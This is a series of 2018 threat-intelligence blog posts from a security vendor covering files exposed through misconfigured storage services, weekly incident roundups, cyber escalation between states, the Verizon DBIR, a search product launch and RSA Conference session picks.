Out In The Open: Corporate Secrets Exposed Through Misconfigured Services Wed, 18 Apr 2018 14:31:10 +0000 For organizations dealing with proprietary information or assets, one of the greatest concerns is the threat of competitors getting hold of trade secrets. But what if organizations are already leaving their precious Intellectual Property (IP) publicly exposed, within easy reach of attackers?

Our latest research report, “Too Much Information”, highlights the sheer scale of this occurrence. The reality is that a lot of organizations are giving up this information freely, by unintentionally exposing IP through Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


Would you like any secret source with that?

Among the 1.5 billion files we found exposed through these services were over 95,000 examples of source code information, 900 patent applications, and 69 copyright applications.

Figure 1: Types of publicly-available intellectual property

In one instance, we detected a document containing proprietary source code that was submitted as part of a copyright application (Figure 2). The file included code that outlined the workflow and design of a site providing Electronic Medical Records, all of which was uploaded onto a publicly accessible Amazon S3 bucket.

Figure 2: Introductory page for copyright application containing source code for a company’s app

In another example, we came across an archive of patent summaries for a renewable energy technology company (Figure 3). These documents were marked as “strictly confidential” and contained a copious selection of patent applications complete with detailed labelled diagrams, patent application numbers, filing dates and patent descriptions that discussed the advantages and disadvantages of their product.

Figure 3: Redacted page from patent documents belonging to renewable energy company 


Corporate espionage made easy

Of all the data organizations look to control, IP is among the most precious. Loss of IP can have a number of considerable impacts:

  • Financial loss. There are obvious economic consequences to losing your most sensitive IP. First there’s the actual costs associated with dealing with the security incident. Resources will have to be assigned to investigate how the exposure occurred, improving security measures, and dealing with the PR response. Perhaps, more damagingly, the release of product information ahead of schedule can seriously damage an organization’s financial performance. For technology companies, the source code your developers have spent months putting together could suddenly be released by malicious actors ahead of schedule, seriously dampening your sales prospects. For some companies, this could put their future in grave jeopardy.
  • Competitive de-positioning. Imagine a pharmaceutical company that has spent years researching a new drug; all that time and financial input would go to waste if a competitor on the other side of the world now had all the information needed to put that drug into production. Proprietary code, patent applications and copyright information would give your closest business rivals some very timely and useful competitive intelligence.
  • Reputational damage. Loss of IP might cost you customers and contracts, credit ratings, stock market value or brand reputation. No organization wants to be known as a company that can’t keep its own source code under wraps. If companies can’t be trusted to protect their most prized assets, then customers will likely assume that their overall approach to data protection, including protecting personal data, is also lacking.
  • National security risk. Certain industries such as defense, manufacturing and national infrastructure worry of being caught in the midst of great power struggles between states. Nation state or state-affiliated actors conduct espionage campaigns to steal information that can improve a country’s military, market or export trade position. The stakes for properly securing sensitive assets are therefore far higher in certain industries, and extend beyond the immediate concerns of the particular organization involved.


While organizations may worry about corporate espionage conducted through insiders, network intrusions and phishing campaigns, these findings demonstrate that there is already a large amount of sensitive data publicly available. Talk about making the competition’s job even easier.

To learn more about the other types of sensitive data that these services are exposing, download a copy of our report.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

When There’s No Need to Hack: Exposed Personal Information Tue, 17 Apr 2018 14:57:11 +0000 With Equifax‘s breach of 145 million records still fresh in everyone’s memory and the recent Facebook data privacy controversy, protecting personal data has become part of the political, economic and cultural zeitgeist. Debates over how data can be misused are now commonplace, and newsfeeds are awash with stores of “yet another breach of personal information”. There’s a reason for this; data is a valuable commodity, and there’s a lot of money to be made from trading personal information or using it for fraud. Cybercriminals are therefore continuing to launch phishing campaigns and network intrusions designed to collect personal data.

However, our latest research report, “Too Much Information”, highlights that there is a large amount of personal data already exposed that puts your employees and customers at risk. This data is unintentionally made public through misconfigured Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites. Let’s focus on a few examples that illustrate the extent of this exposure.

Tax Returns

Today is tax deadline day, which means there are still people scrambling to submit their tax returns. This window affords criminals opportunities to commit tax return fraud. As we talked about in a previous blog, “It’s Accrual World: Tax Return Fraud in 2018”, criminals go to great lengths to acquire this information. Spoiler alert: there’s plenty of information already out there.

Figure 1: Types of publicly-available personal information

In fact, the most common employee data found in our research was payroll and tax return files, which accounted for 700,000 and 60,000 files respectively. Looking into many of these examples, it was common for this information to be exposed through a contractor – for instance, a boutique accounting firm that backed up their client information. A redacted exposed pay stub is shown in Figure 2.

Figure 2: A redacted example of an exposed pay stub

Unhealthy Exposure

Aside from financial information, there was also a strong medicinal flavor to the findings. Almost 5000 patient lists were publicly available. Most surprisingly, we found over two million .dcm files (2,205,350) exposed on an open SMB port based in Italy. These Digital Imaging and Communications in Medicine (DICOM) files enable the creation and storage of medical tests, like MRIs, that contain personal health information. That’s an awful lot of files, and it doesn’t get much more personal than that.

Personally Identifiable Information versus Personal Data

Personally Identifiable Information (PII) and Personal Data are two terms that are often used interchangeably.  PII is mainly used in the U.S. and is defined by NIST as:

“Any information about an individual maintained by an agency, including (1) any information that can be used to distinguish or trace an individual‘s identity, such as name, social security number, date and place of birth, mother‘s maiden name, or biometric records; and (2) any other information that is linked or linkable to an individual, such as medical, educational, financial, and employment information.”.

Pretty comprehensive, right? Well, not as comprehensive as “personal data”, which broadens the definition to include things like device ID, IP addresses, and cookies. Personal data is used as part of the General Data Protection Regulation (GDPR) definition, which comes fully into place next month.

Our research found that a significant portion of the exposed data was in the European Union (537,720,919 files). With GDPR firmly on the horizon, organizations must consider how they are protecting employee and consumer information across these services. With employees and contractors often backing up and archiving data on their home networks or using cloud storage solutions, organizations need to ensure they have visibility into all the potential areas their customers’ personal data may be exposed. Out of sight may mean out of mind, but with GDPR coming into force, this could also mean organizations may soon be “out of pocket”.

Figure 3: The top countries making up the 500 million exposed files in the European Union


To learn more about the other types of sensitive data that these services are exposing, download a copy of our report. You can also find out more about the implications of GDPR in our “Path to Compliance” paper.


Want more Digital Shadows research? Subscribe to our threat intelligence emails here.

Shadow Talk Update – 04.16.2018 Mon, 16 Apr 2018 14:32:47 +0000 This week’s Shadow Talk discusses a Cisco Smart Install Client flaw exploited in disruption attack, an information leak vulnerability discovered in Microsoft Outlook, details on OpIcarus and OpIsrael, Verizon DBIR, and why you still should be excited about the RSA Conference.


Cisco Smart Install Client enabled mass disruption

Attackers abused a legitimate Cisco Smart Install Client protocol to target Iranian and Russian switches in a disruptive operation. Through defacements left on start-up configuration of affected devices and statements to journalists, the perpetrators claimed to have acted in defense of the integrity of United States elections, although their identity and origin remains unknown. This activity occurred within the context of escalating political tensions between the United States and the impacted nations. The tools needed to identify and exploit the flaw are readily available, potentially allowing exploitation by attackers with even low capabilities. System administrators should disable the Smart Install Client function and limit access to Port 4786/tcp to mitigate exposure.

New ATM malware variant discovered

A potentially new variant of automated teller machine (ATM) malware, “ATMJackpot”, was documented by security researchers. Its operators attempt to steal cash from ATMs by connecting to cash dispensers and other peripheral devices via a piece of middleware called eXtension for Financial Services (XFS) Manager. Because the initial infection vector for ATMJackpot is not known, a full assessment of its threat cannot be made at the time of writing. If the malware was installed via network intrusion, that would typically require technical capability and would indicate that the wider attack campaign represents a high level of threat. However, if it was installed via physical access to ATMs, fewer skills would be needed and the financial impact would likely be significantly lower. Given the lack of details, the discovery of ATMJackpot does not necessarily represent a dramatic escalation in threat.


Microsoft Outlook flaw allows theft of password hashes

A Microsoft Outlook flaw enables attackers to abuse the way the software renders email messages containing Object Linking and Embedding (OLE) objects, and gather user password hashes and other sensitive information. A patch has been released for this vulnerability (CVE-2018-0950); without it, if an OLE object is hosted on a remote server and embedded in a message, Outlook initiates a connection via Server Message Block (SMB). The result is unauthorized information disclosure, with greater consequences if the technique is combined with other exploits. Digital Shadows has not seen reports of the vulnerability’s exploitation in the wild, although it would not require a high level of capability. Implementing the patch and blocking inbound/outbound SMB connections to the network perimeter, where possible, can be effective. 


Film service customers victims of payment data breach

On 09 Apr 2018, multiple media outlets reported on an allegedly targeted attack against food-service and facility-management company Sodexo’s cinema voucher program, Filmology. Sodexo stated that credit cards used on its website between 19 Mar 2018 and 03 Apr 2018 may have been compromised, and that it continues to investigate. However, a Filmology representative allegedly claimed that “the hack on the payment page was carried out over 2 months and involved many accounts”. Customers of Sodexo’s Filmology service should monitor for fraudulent charges to their credit cards and consider replacing those used during the date range stated by the company.


Compromised websites delivered NetSupport Manager RAT

On 05 Apr 2018 researchers at security company FireEye reported on a campaign delivering the commercially available “NetSupport Manager” remote-access tool (RAT). Threat actors used compromised websites to prompt visitors to download fake Flash, Chrome and Firefox updates. These were JavaScript files that ultimately fetched the RAT payload from a remote server. Digital Shadows’ research into the IP address used in the campaign demonstrated it has likely been used to distribute malware since at least November 2017. The threat actors have likely had some success, given the duration of activity. Their motive is unknown. Indicators of compromise can be found on the Digital Shadows online portal.


New activity sparked by OpIsrael and OpIcarus

Beginning on 07 Apr 2018 multiple hacktivists tweeted attack claims, as part of OpIsrael, an “Anonymous” collective-affiliated operation in support of Palestine. Attack claims typically included website defacements. However, Twitter user LorianSynaro also claimed to have obtained databases of 83 Israeli universities; a sample uploaded to code-sharing website Hastebin contained no sensitive information and was likely obtained from open sources. More OpIsrael claims are likely in the short-term future (within three months). Moreover, an operational announcement has called for a new phase of the OpIcarus hacktivist campaign in June 2018. The type of activity was not stipulated, but will highly likely include denial of service (DoS) attacks and data breach claims against financial entities. Recent iterations of OpIcarus have attracted scant threat actor involvement; thus, this new phase poses a very low risk at this time.


New botnet scanning activity targeting Brazil

Security company Trend Micro identified and reported on scanning activity targeting vulnerable internet of things devices in Brazil. The scanning originated with several compromised devices in China and mirrored the behavior of previously identified “Mirai” botnets, which used default and weak credentials to hijack devices. Mirai’s source code was publicly released in October 2016, which has enabled numerous threat actors to develop their own botnets of varying size. Targeting weak credentials is a common tactic used to create botnets; users should replace these with complex passwords.

Escalation in Cyberspace: Not as Deniable as We All Seem to Think? Thu, 12 Apr 2018 15:01:47 +0000 The recent assassination attempt on former Russian spy Sergey Skripal has led to a deluge of cyber-based conspiracy theories within the London security community. My own personal favourites are that (a) Skripal was targeted for assassination due to his alleged engagement with the UK security services over the Democratic National Congress hack in 2017, and (b) that the UK government considered a cyber-attack on Russia in response to the assassination attempt. To date, both these claims remain completely unsubstantiated. However, that so many theories around the Skripal assassination attempt link cyber operations to a conventional covert operation is symptomatic in my mind of how intertwined with cyber threats modern international relations has now become.


Escalation and de-escalation in international relations

International Relations (IR) is a deeply complex field of study that is increasingly integrating cyber security issues into its analysis. One concept within the field of IR that is particularly useful for understanding issues such as the ones generated by the Skripal event is that of escalation in levels of hostilities between states. Escalation occurs between states during or in the run-up to a period of conflict, and a situation can be seen either to be escalating or de-escalating depending on the situation and the wishes of the states involved.

One of the best examples of escalation is the Cuban missile crisis of 1962, when the construction of ballistic missile launch facilities (silos) on the island led the Kennedy administration to impose a military blockade and demand the withdrawal of all weapons from Cuba. Within this case an important point to note is that the processes of escalating and de-escalating involved signalling between the US and Russia. Examples of signalling within the crisis included the building of missile silos (escalation), Kennedy’s address to the US on the 22 October 1962 (escalation), Soviet withdrawal of missiles (de- escalation), and US public commitment to respect Cuban sovereignty (de-escalation). These are all examples of both provocative and palliative signalling between the states.


Figure 1: Cuban Missile Crisis game tree modelling how US and Soviet actors would have considered their decisions (Source: Wikimedia Commons)


Cyber and the “space between”

Cyber operations are often, I believe incorrectly, portrayed as being desirable precisely because they do not cause escalation between states. As Eric Rosenback former Assistant Secretary of Defence and principle cyber advisor to the Pentagon from 2011 to 2015 commented:

“The place where I think it will be most helpful to senior policymakers is what I call “the space between.” What is the space between? … You have diplomacy, economic sanctions…and the you have military action. In between there’s this space, right? In cyber, there are a lot of things that you can do in that space between that can help us [the United States] accomplish the national interest.”

The “in between” area referred to by Rosenback is symptomatic of the sentiment that cyber operations have a high level of plausible deniability and hence do not have the potential to escalate a conflict in the same way a physical operation does.

However, a historical review of major cyber incidents shows this theory to simply not be true. The distributed denial of service (DDoS) attacks on the Estonian economy circa 2007 are still used to frame Russia as a highly aggressive cyber actor, even though the attribution is thin. After the Sony hack of 2014, the US conducted a  thinly veiled cyber-attack on the North Korean Internet. One of the legacies of the Stuxnet incident of 2010 was Iran prioritizing the development of its own cyber warfare capability that bore its own bitter fruit in 2012 with an attack on Saudi Aramco.

What all these cases show is that far from being a consequence-free way of striking against an enemy, when attributed to a state (no matter how tenuously) cyber-attacks can lead directly to escalation. Herein lies the issue with cyber conflict: signalling between states in physical space such as the Cuban missile crisis is very clear; however, within cyberspace what is an escalating and de-escalating signal is very difficult to interpret.

Coupled with this is the issue of proportionality and what the cyber equivalent of a minor skirmish versus an all-out assault actually is. Here the potential for unplanned escalation between states rises exponentially. As a recent Chatham House paper commented: “there is a risk that any such [cyber] operation could be construed by the targeted state, or even the international community at large, as a use of force, leading to escalation of the situation”.


To conclude, what we have not seen to date is a “cross over event”, where a physical act of violence has provoked a cyber-attack that has in turn escalated to a retaliatory act of physical violence. Nevertheless, the discussions around events such as the Skripal assassination attempt have put this type of scenario on the agenda. Within this context, the idea that cyber is somehow “the space between”, where action has no consequence, is now simply incorrect.


To learn more, subscribe to our threat intelligence emails here.

Leveraging the 2018 Verizon Data Breach Investigations Report Tue, 10 Apr 2018 18:24:15 +0000 Today, the 11th edition of the Verizon Data Breach Investigations Report (DBIR) has been released. This year’s report includes 53,308 security incidents, 2,216 data breaches, 65 countries, and 67 contributors.

I participated in a panel discussion with the Verizon team on BrightTALK earlier today. Listen to the recording here.



The DBIR is one of the most anticipated annual reports and has endured for many years. If you’ll indulge me and take a trip down memory lane, here are some of the events you might remember from the year the first DBIR was written:

  • The first Twilight film was released, and the nation was divided by “Team Edward” or “Team Jacob.”
  • The Dark Knight starring Heath Ledger was released. This serves as a painful reminder of just how terrible Ben Affleck’s Batman is.
  • The stock market crashed on September 29, 2008.

Some of the key findings for me:

  • “68% of breaches took months or longer to detect.” In a world of real time this and real time that, I’d be happy to forgo the real time if I get better fidelity alerting. From both my time at Forrester and my time now as CISO, I generally view “real time intelligence” as “real time false positives” that are going to create more work for my security team. If we are looking at “months or longer” for breaches, I’d be happy to wait a few more hours or days to get better quality reporting that doesn’t DoS (denial of service) my team and reduce my overall time to detect.


  • Ransomware is the top flavor of malicious software, found in 39% of cases where malware was identified. You must have a plan for extortion attempts, and not just ransomware, but also DDoS extortion or intellectual property extortion. Your business continuity planning must take these scenarios into account. My colleague Harriet Gruen and FBI Supervisory Special Agent, Sheraun Howard, recently did a webinar on ransomware that you might find useful. “Emerging Ransomware Threats and How to Protect Your Data


  • I find the “Denial of Service: Storm preparations” section to be particularly relevant. This was a focus area of mine at Forrester and I also have to deal with this in my day job. DDoS “attacks, on average, are more like a thunderstorm than a Category 5 hurricane”. “You will find that most of the attacks are measured in minutes.” The question for CISOs is how much do I invest in a thunderstorm? Do I have enough budget to prep for a Category 5 hurricane? When it comes to budget tradeoffs these are important questions.  Having intelligence on threat actors who conduct these activities against your industry can help with this calculation.


  • JavaScript (.js), Visual Basic Script (.vbs), MS Office and PDF10 tend to be the file types found in first-stage malware. This isn’t breaking news, but it’s a good reminder to make sure we incorporate this into our vulnerability management triage process. We should be tracking the software, technologies and CVEs that malware is exploiting.


Source: Verizon DBIR

Since we are eleven years into the DBIR, I suspect that you are familiar with how to leverage the report, but just in case you aren’t, here are some quick suggestions:

  • The report is filled with great content, and there is a lot of it. The report is nearly 50 pages without the appendices. I found it useful to read through it once in its entirety before I started making notes. I understood the full context and then I could start breaking it down into “byte-sized” bits.


  • Yesterday was National Unicorn Day, and you may very well be a unicorn. Not everything in the DBIR will apply to your business. Make sure to take this into consideration while reading the report.


  • Go to Figure 28 “Industry Comparison” on page 26, look at your industry and the attack patterns that are most common in the DBIR data set. Do you have the appropriate security controls in place to detect and mitigate these attacks?


Source: Verizon DBIR

  • You can use the attack patterns to build intelligence requirements and to kick start your collection plan. For example, if you are in the banking industry you can build or buy collection capabilities around these areas:
    • Banking Trojans (tools, actors, exploits, configuration files)
    • Denial of service (tools, actors, target selection)


I’ve already read through the DBIR multiple times and with each subsequent reading I find something else that is useful. One final recommendation that I’ve been suggesting for many years is to create your own version of the DBIR based on your own intrusion and breach data. Nothing is more relevant than what is happening within your own organization. The DBIR has some great examples of graphics that you can incorporate into your own tailored reports, which you can then use to communicate the threat landscape to your executives.


To learn more, subscribe to our threat intelligence emails here.

Introducing Shadow Search – Quickly enable deeper research and investigation Tue, 10 Apr 2018 01:35:30 +0000 All enterprises face key challenges in their quest to protect their organization from cyber threats. One challenge I hear consistently from security professionals is the difficulty keeping up with the volume of alerts generated by their security controls. The problem they face is that each alert needs to be analyzed and understood before a decision is made. To do that, teams are using a range of tools and information like open source feeds, specialist news or blogs, and threat intelligence sources to enrich their understanding of the alert before they can make a decision. This enrichment takes time. Unfortunately time is perhaps the scarcest commodity for security professionals because there aren’t enough of us, the number of alerts is ever increasing and the pressure is on because the costs of poor decisions are going up.

Shadow Search, the enhanced search capability we are adding to our SearchLight service, is all about giving a bit of time back to security teams. Our customers were telling us that the insight we provided with our Digital Shadow alerts could be really useful in support of their security operations process for alerts from other sources. When we looked at this, we felt there was an opportunity to add more information sources and scope to make the massive amounts of data from the deep, dark, and open web more accessible and discoverable from the SearchLight portal, better supporting these customers as they make decisions.

So I am excited that we have just launched our new “Shadow Search” capabilities, designed specifically to provide the data that security teams need to make decisions faster. Shadow Search transforms the threat intelligence search function, delivering market leading coverage and user experience. Users now have unrestricted access to a vast and expanding Digital Shadows content repository to investigate and pivot between data sources, threat actor information and incidents.



Shadow Search includes security relevant sources as diverse as criminal forums, reputable security blogs and dark web pages, in addition to Digital Shadows cyber threat intelligence (CTI) and third-party threat intelligence feeds. Organizations can use this practical and actionable information to enhance their understanding of threats, in their business context. Examples of use cases include the ability to:

  • Investigate security incidents – pivot from observed incidents on your network to gain further context about a threat or threat actors
  • Monitor global events and industry trends – access to real-time data and finished threat intelligence allows you to track threats associated with geography, sector or area of interest and stay ahead of the unfolding developments
  • Manage third party risk – identify weaknesses in your supply chain, including if a supplier has been the subject of a breach, or vulnerabilities in your software are being commonly exploited in the wild
  • Research threat information to help prioritize resource usage – detect new activity by a tracked threat actors and changes to malware campaigns to support business cases

Analysts can save their searches and return to them or subscribe to receive updates that meet their specific enterprise criteria.

Shadow Search benefits include the following:

  • Immediate access to threat data– Get instant access to raw collection when you need it.
  • Broad coverage – A vast repository of data including curated threat intelligence, content for hard to reach web sources (dark web) and more, including exploits and observables, all in one place opened up for search.
  • Relevant results – Smart filters and powerful search syntax allowing users to focus in on the information that’s most relevant to them.
  • Actionable information – Rich results with associated observables, intuitive interface, and full export enables users to make operational use of the results.

Collaborative development

Having only recently joined Digital Shadows, I got my hands on the capability after it had been extensively trialed by our beta customers; a huge thank you goes to those who collaborated with us on that process. I found the UI intuitive, and the timeline and summary views help put the results in context.

We’ve added features like advanced filtering by source, date range and information type and export capabilities in direct response to the feedback we have had from the beta. See the screen shot above for a view of the Shadow Search interface, but only a hands-on demo really does it justice. It will be at RSA Conference for those who are attending and if you can’t make it, we would be happy to arrange a demo for you.

Our beta clients now tell us it’s easy to investigate an incident and pivot to related research and forums or research threat actors and that the unrestricted access to the original sources and proprietary Digital Shadows cyber threat intelligence (CTI) is very welcome. Most importantly, we are now hearing that it is saving them time.

One beta test meeting with a worldwide manufacturer particularly stands out for me: “You’ve incorporated all my requirements and suggestions; this is awesome. It will save me time and help me focus on priority research and threat investigations.”

In Summary

I think Shadow Search is a truly valuable addition to our SearchLight service and will help our clients to use our wealth of knowledge to investigate threats and make decisions faster, giving back valuable time to the security operations function. Learn more about Shadow Search by downloading our datasheet or requesting a demo. It will be available to all customers in Q2.

Shadow Search for Digital Shadows SearchLight™
Stay up to date with our latest news and threat intelligence. Subscribe to our threat intelligence emails here.

Shadow Talk Update – 04.09.2018 Mon, 09 Apr 2018 20:52:07 +0000 Back from the Easter break, this week’s Shadow Talk discusses what the re-emergence of WannaCry, exposure of Aggregate IQ data, exposure of 1.5 billion files through misconfigured services, as well as lessons learned from the Panera breach, an emerging new criminal market, and much more.

Oil pipeline company disrupted by unidentified cyber attack

Certain parts of the electronic data interchange (EDI) communication system used by a US oil and gas pipeline company were rendered temporarily unavailable by an unspecified online attack. At the time of writing, the attackers’ tactics, techniques and procedures (TTPs) remain undetermined. The victim company, Energy Transfer Partners LP, stated that the flow of natural gas remained unaffected throughout the incident, and that no information was stolen or compromised. Oil and gas companies, including those affiliated with national infrastructure, continue to be prime targets for financially motivated and espionage-seeking threat actors.

Malaysian central bank thwarts SWIFT attack

Bank Negara Malaysia claimed to prevent a theft of funds via the Society for Worldwide Interbank Financial Telecommunication (SWIFT) system. The attackers had tried to make fraudulent wire transfer requests through the SWIFT platform. Bank Negara Malaysia stated that no funds were stolen, and that the payment and settlement systems were not affected or disrupted. In the past six months, several financial entities in Russia and South-East Asia have been targeted by attackers attempting to steal funds via SWIFT. The continued targeting of financial institutions and their geographic concentration indicate a single threat group may be responsible. Given that these attacks target banks’ internal security systems, rather than the central SWIFT system, the perpetrators may be perceiving these locations as having weaker internal security standards.

Boeing production plant infected by WannaCry

The “WCry (aka WannaCry) malware reportedly infected a small number of computers at a Boeing production plant, triggering concerns that airframe testing equipment and software may have been compromised. Boeing later stated that no disruption had been caused to its production programs. It remains unknown whether this version of WCry was the same used in the widespread campaign of May 2017, and therefore whether the same threat actor is responsible. Alternatively, this version may have been spoofed and exploited by different threat actors to encourage swift payment of the ransom through WCry’s notoriety.

Luxury retailers hit by credit card breach

Credit card details held by luxury retailers Saks Fifth Avenue and Lord & Taylor were breached, and a portion of the data was advertised for sale on dark web marketplace Joker’s Stash on 28 Mar 2018. Security research company Gemini attributed the breach to financially motivated threat actor “FIN7; however, evidence for this attribution remains unclear. The retailers’ parent entity, Hudson’s Bay Company, did not specify how many customers were affected, but more information may be released in the near future (next three months).

Millions of Panera customers’ personal details allegedly compromised

On 02 Apr 2018 security researchers reported that a flaw on PaneraBread[.]com, the main website of United States bakery-café-restaurant chain Panera, had potentially left over seven million customer records exposed since Aug 2017. Threat actors could use the data for identity theft and fraud, although Digital Shadows’ research has uncovered no evidence that the records have been used maliciously. The flaw appears to have been fixed on 02 Apr 2018, but prior to that the information could have been downloaded by threat actors and it may remain available.

ChessMaster observed exploiting CVE-2017-11882

Espionage campaign ChessMaster has shown updated TTPs in the ongoing targeting of a variety of industries in Japan, by using an exploit for CVE-2017-11882, which exploits a vulnerability in Microsoft Office’s Equation Editor. Its use has been observed several times over the past five months in campaigns by various threat actors. Enterprises using Microsoft Office 2007 to 2016 should apply relevant security updates from Microsoft.

One CISO’s Recommendations for Making the Most of RSA Conference Sessions Mon, 09 Apr 2018 15:19:15 +0000 Last week, Enterprise Strategy Group (ESG) principal analyst, Jon Oltsik, wrote an article for CSO titled: “RSA Conference: CISOs’ top 4 cybersecurity priorities.” Jon highlighted four areas that security executives will be looking for at next week’s RSA Conference:

  1. Executive-level threat intelligence (Jon highlighted Digital Shadows in this category)
  2. Integrated security platforms
  3. Business risk
  4. Changing security perimeters

In the past, I’ve written my own RSA Conference (RSAC) preview blogs and Jon’s article reminded me that I should do it again. A few things to note before I get started:

  • This blog is going to be focused on conference talks that will resonate with most CISOs.
  • I know there will be many other activities going on next week and you have limited time, let me help you maximize the time you have allotted for talks.
  • You should absolutely take advantage of “hallwaycon” and all the networking opportunities associated with the RSAC week. This will get you the best return on your investment.
  • You could just go to the RSAC “Sessions & Events” page and search by the “Core Topic” of “C-Suite View” or “Security Strategy,” but your time is precious. So, to save you some, I spent the morning going through the RSAC agenda, so you don’t have to.
  • I focused on the following areas: (1) investment, metrics, and communication, (2) GDPR, (3) recruiting and retaining staff, (4) third party risk, (5) cloud native security, and (6) national security.


Here are my recommendations for the RSAC talks you should check out:

  • The Innovation Sandbox. This isn’t a talk, but something I highly recommend nevertheless. I’m a big fan of the Innovation Sandbox, and while I was at Forrester Research I moderated several panels at the event. I admit I could be a bit biased towards it. The Innovation Sandbox is a great way to track startups that could help you solve some of the challenges that CISOs face. It is also fun to watch the pitches, and you can also pick up techniques to improve your own presentation style/public speaking. This can be very useful, particularly as you think about it applying to your own board presentations.
  • Investment, metrics, and communication. This year, there is no shortage of CISO focused talks. I suggest the following as the topics really resonate with me and there are also real work examples from practitioners in the mix. These talks also align with Jon Oltsik’s business risk area from his CSO article.
    • Stop Translating, Start Defending: Common Language for Managing Cyber-Risk TECH-W04
    • Building and Selling Your Security Strategy to the Business STR-W14
    • Creating Order from Chaos: Metrics That Matter GRC-W04
    • Implementing a Quantitative Cyber-Risk Framework: A FinSrv Case Study STR-W02
    • Security Programs. ROI not CYA EXP-R14
    • Charting a Clear Course: Prioritizing Security Investments and Activities STR-T07
    • 10 Tenets of CISO Success STR-W04
    • Inside Cyber-Balance Sheets: A Rare Window on Digital Risk in the Boardroom CXO-R14
  • GDPR. Worried about GDPR? You will be. If you deal with European Union citizen data, this year’s RSAC has you covered and it’s important since GDPR enforcement is now “next month.” I’m almost as excited for GDPR as I am the for Deadpool sequel featuring Thanos, and the new Han Solo movie (please, please save it Donald Glover). While I work on my Privacy Impact Assessments, consider these talks:
    • How to Tackle the GDPR: A Typical Privacy and Security Roadmap PRV-T10
    • The GDPR Is Only for Europe—Right? GRC-R02
    • GDPR Compliance—You Forgot Your Digital Environment GRC-R12
  • Recruiting and retaining staff. I think the “cyber security talent shortage” is a self-fulfilling prophecy. Don’t be a statistic, and don’t succumb to the hype! I think these talks can help you:
    • A NICE Way to Find and Keep Cybersecurity Workers PROF-W04
    • The Cybersecurity Job Seekers Report: Results and Implications AST1-W02
    • The Life and Times of Cybersecurity Professionals AST3-R02
  • Third party risk. I’m always looking for ways to get better at managing third party risk and if you read the headlines, nearly everyone else should be looking as well. I would’ve liked to have seen more talks on this topic. I included some Peer2Peer talks in here as well:
    • Personality Profiling Your Third Parties for Effective Supplier Management STR-T08
    • The Supply Chain Threat GRC-T10
    • Effectively Managing a Third-Party Technology Risk Program P2P4-R05
    • Third-Party Risk Assessment Tilt-A-Whirl. Stop the Ride, I Want to Get Off! P2P3-W04
  • Cloud security. Cloud security is a key component of our security program and the same is likely true for you. I really like the contrast of following two talks. In the first, you have one of, if not the top industry analyst who covers cloud security Rich Mogull (of Securosis fame). In the second, you have the founder and former CEO of Tim Prendergast, who is now the Chief Cloud Officer at Palo Alto Networks. was recently acquired for a cool $300 million.
    • Building and Adopting a Cloud-Native Security Program CSV-W14
    • Is Cloud-Native Security Enough? SPO3-W14
  • National Security. I’m a self-professed national security geek and I think all CISOs need to track geopolitical and national security issues. Check out these talks:
    • Cyberwar Game: Behind Closed Doors with the National Security Council EXP-T07 (I’ll pretty much watch anything Jason Healey is involved in)
    • DARPA R&D Enabling US Cyber-Deterrence PNG-F03R (DARPA is cool, and they are doing this talk twice!)
    • Former NSA and Israeli Intelligence Directors on Resilience EXP-F01 (Despite getting 8200’d/NSA’d to death at Forrester, I still want to see this talk).

Am I missing any talks that resonate with you? Please share.

I know that many people (queue the Infosec Twitterverse) bash big security events like RSAC, my suggestion is to ignore that and make the most of the event. Next week is a great opportunity to gain knowledge that you can bring back to your team and an excellent opportunity to build your professional network.

Next week is also a great time to unwind and step away from the chaos that is being an information security professional.  Digital Shadows is sponsoring the “Security Leaders” party on Tuesday night April 17th at City View @ Metreon. Come join us and have a good time with your peers and make some new friends. You can register here.

RSA Party Digital Shadows

When Sharing Is Not Caring: Over 1.5 Billion Files Exposed Through Misconfigured Services Thu, 05 Apr 2018 12:23:14 +0000 Our recent report “Too Much Information”, discovered over 1.5 billion files from a host of services, including Amazon S3 buckets, rsync, SMB, FTP, NAS drives, and misconfigured websites.


We love data, and we need ways to store, share and transfer this data to other individuals and parties. There are a range of services that are used to do this, and one way that has gained popularity over the last few years is cloud storage, specifically Amazon Simple Storage Service (S3) buckets. Unfortunately, many administrators misconfigure these S3 buckets rendering the contents publicly-accessible. Barely a month goes by without another open S3 bucket being discovered – who remembers the data of 198 million voters being exposed last year?

However, S3 buckets are not alone. In our research we found that they only constituted seven percent (7%) of the exposed files we found. Many other services that are used to store, share, or transfer data are also frequently misconfigured:

  • File Transfer Protocol (A network protocol used to transfer computer files);
  • rsync (A way of transferring and synchronizing files);
  • Server Message Block (A network file sharing protocol);
  • Network-attached storage devices (Devices often used to backup home computers).

Combined, these services expose over 1.5 billion files, with SMB, rsync and FTP accounting for 33, 28, and 26 percent respectively.


What’s the damage?

The amount of exposed data is staggering. Over twelve petabytes of data is exposed (12,000 terabytes). For context, this is over four thousand times larger than the “Panama Papers” leak (2.6 terabytes). It’s also 12 thousand times larger than the Deep Root exposure of 198 million voters in 2017. Almost all countries are affected, but the United States experienced the most exposure with 239,607,590 files.


Figure 1: Geographical distribution of exposed data


Types of Exposed Data

It’s not just the volume but the sensitivity of the data that is a major cause for concern. There were a number of instances of high severity exposure of personal information, intellectual property, and security assessments.

There is an incredible amount of personal data exposed, including payroll, tax return and healthcare information. If we consider how much is exposed (the news that the data of 87 million Facebook users may have been harvested is a good example), this adds significantly to this already rich trove of data, providing more and more information that could be used for malicious purposes such as social engineering and fraud. Furthermore, with GDPR fast-approaching, there are clear regulatory concerns for organizations surrounding the protection of personal data, particularly if employees and contractors are copying and archiving work files using cloud storage and NAS solutions.


 Figure 2: Types of publicly-available personal information


Our report also highlights numerous cases of intellectual property that is also exposed through these services. In one instance, a technology company providing Electronic Medical Records software had their copyright application and full source code publicly-available. In another instance, an energy company had sensitive details and diagrams of their patent-pending technology exposed. Loss of intellectual property can also have considerable financial and reputational impacts.


Figure 3: Types of publicly-available intellectual property


Finally, there were a worrying number of security assessments made available. This includes thousands of penetration tests, network diagrams, and security audits. We found a series of security documents belonging to a leading European supplier of electronic identification services used within the banking industry. These files contained in-depth security assessments, source code testing results, and vulnerability scanning reports that revealed details on insecure servers. These infrastructure reports exposed server locations and hosting IPs, missing software patches, port information, CVE numbers, and vulnerability descriptions that may allow an attacker to modify data, inject malicious code, or perform man-in-the-middle attacks. This type of information is a goldmine for attackers targeting organizations, and an attacker will typically spend weeks, if not a couple of months performing reconnaissance on their targets to glean this exact type of information.


Figure 4: Types of publicly-available security assessments


